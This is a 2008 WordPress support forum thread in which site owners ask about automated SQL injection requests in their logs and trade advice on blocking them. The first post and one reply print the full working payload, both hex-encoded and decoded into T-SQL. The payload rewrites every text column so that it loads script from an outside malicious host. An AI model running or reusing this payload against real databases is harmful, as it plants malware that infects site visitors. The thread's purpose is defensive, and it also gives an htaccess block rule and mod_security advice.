Title: Under Attack
Last modified: August 19, 2016

---

# Under Attack

 *  [mystifier](https://wordpress.org/support/users/mystifier/)
 * (@mystifier)
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/)
 * I have recently had lots of requests on my website trying to run code using the
   below querystring mechanism. Is there any danger ?!
 * >>>
 * [http://www.mysite.co/](http://www.mysite.co/)?;DECLARE%20@S%20CHAR(4000);SET%
   20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%
   20AS%20CHAR(4000));EXEC(@S);

Viewing 13 replies - 1 through 13 (of 13 total)

 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830702)
 * no.
 *  [pacq](https://wordpress.org/support/users/pacq/)
 * (@pacq)
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830741)
 * Hello,
    the same happened to me. Looking at the log files, I noticed the following
   record:
 *     ```
       116.48.67.106 - - [09/Aug/2008:05:58:47 +0300] "GET /2008/03/15/sottsass/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x 
   
       ....about 650 hex characters follows...
   
       0CHAR(4000));EXEC(@S); HTTP/1.1" 200 11878 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
       ```
   
 * The hex string, once translated, shows the following:
 *     ```
       GET /2008/03/15/sottsass/?';DECLARE @SCHAR(4000);SET @S=CAST(DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS% CHAR(4000));EXEC(@S)
       ```
   
 * Where is a reference to a js script, located in (omitted here):
    This scripts,
   also, has references to three urls (omitted here).
 * In particular, the last two are reported as malicious sites.
 * The attack comes from:
    IP : 116.48.67.106 Host Name : n1164867106.netvigator.
   com Country : Hong Kong
 * Is it a possible security problem of WordPress?
    What are the potential risks?
 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830779)
 * It’s only a security problem if Something Bad(tm) happens.
 * 1. Unless someone is able to use your server to redirect traffic or execute on
   their browser exploit code (end user hits you with that URL and then KABLAM on
   them)
 * or
 * 2. Those URLs cause your WordPress installation getting compromise and exploited(
   data successfully added to your database or filesystem).
 * If either one appears to be happening then it’s a successful exploit (maybe).
 * If the end user making the URL request simply gets your 404 page or just the 
   post at /2008/03/15/sottsass/ (the post, the whole post, and nothing but the 
   post) then it’s a _failed_ exploit attempt.
 *  [addpdg](https://wordpress.org/support/users/addpdg/)
 * (@addpdg)
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830794)
 * My logs are showing multiple sources for the GET requests, and as far as i can
   tell, no penetration. Somebody is flexing their bots, either believing in error
   they have found a MySQL/WordPress flaw, or looking for unpatched WordPress codebase,
   on which this works.
 * Mildly irritating in that it eats a bit of bandwidth and fuzzes my stats, but
   other than that, script-kiddie lame.
 *  [pacq](https://wordpress.org/support/users/pacq/)
 * (@pacq)
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830813)
 * >  1. Unless someone is able to use your server to redirect traffic or execute
   > on their browser exploit code (end user hits you with that URL and then KABLAM
   > on them)
   > or
   > 2. Those URLs cause your WordPress installation getting compromise and exploited(
   > data successfully added to your database or filesystem).
 * Thank you for your explanation.
    I checked either the database either the logs,
   all seems ok (for now).
 * But… they did not have nothing else to do?
 *  [tflight](https://wordpress.org/support/users/tflight/)
 * (@tflight)
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830824)
 * > Mildly irritating in that it eats a bit of bandwidth and fuzzes my stats
 * If you really wanted to you could add a couple of lines to your htaccess file
   to block any request where the query string contains the word declare
 *     ```
       RewriteCond %{QUERY_STRING} ^(.+)declare(.+)$ [NC]
       RewriteRule ^.* - [F,L]
       ```
   
 *  [addpdg](https://wordpress.org/support/users/addpdg/)
 * (@addpdg)
 * [17 years, 10 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830831)
 * _@ tflight_ – Thank-you; you just saved me a trip into my Apache books, looking
   for the proper syntax. It’s greatly appreciated.
 *  [graegerts](https://wordpress.org/support/users/graegerts/)
 * (@graegerts)
 * [17 years, 9 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830994)
 * addpdg – Don’t forget to prepend `RewriteEngine On` otherwise both lines will
   have no effect.
 *  [ogre](https://wordpress.org/support/users/ogre/)
 * (@ogre)
 * [17 years, 9 months ago](https://wordpress.org/support/topic/under-attack-1/#post-830995)
 * For those who have the option of installing additional apache modules, mod-security
   is an excellent package that can prevent sql injection attacks before they even
   get to the application.
 * See [http://www.modsecurity.org/](http://www.modsecurity.org/)
 *  [bartmoss](https://wordpress.org/support/users/bartmoss/)
 * (@bartmoss)
 * [17 years, 9 months ago](https://wordpress.org/support/topic/under-attack-1/#post-831015)
 * Googling for this seems to indicate that its an asp and/or coldfusion attack.
 *  [Alex.](https://wordpress.org/support/users/alex-1/)
 * (@alex-1)
 * [17 years, 9 months ago](https://wordpress.org/support/topic/under-attack-1/#post-831016)
 * I just registered to post about this, but luckily I found this thread before 
   opening a new one. I got four such requests on my WordPress site yesterday (in
   an interval of 4 seconds), but nothing bad seemed to have happened. I had 2.5.1
   installed, but I only noticed those requests after I had finished upgrading to
   2.6.1.
 * Still a bit discouraging, almost makes me want to go back to either a static 
   website, or a super-simple self made solution with flat files, without any comment
   support of course, as that’s a whole new can of worms…
 * Agch.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years, 9 months ago](https://wordpress.org/support/topic/under-attack-1/#post-831017)
 * @ Alex.
 * Consider that a PHP application is being is seeing exploit attempts that are 
   actually CF attacks. Whats that tell you?
 * having a static web site doesnt save you from scripted attacks –
 * If you dont want to see ANY attacks, the realistically, you should not have any
   web site.
 *  [Sushubh](https://wordpress.org/support/users/sushubh/)
 * (@sushubh)
 * [17 years, 8 months ago](https://wordpress.org/support/topic/under-attack-1/#post-831046)
 * seeing these attacks on my blog today.

Viewing 13 replies - 1 through 13 (of 13 total)

The topic ‘Under Attack’ is closed to new replies.

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 13 replies
 * 11 participants
 * Last reply from: [Sushubh](https://wordpress.org/support/users/sushubh/)
 * Last activity: [17 years, 8 months ago](https://wordpress.org/support/topic/under-attack-1/#post-831046)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics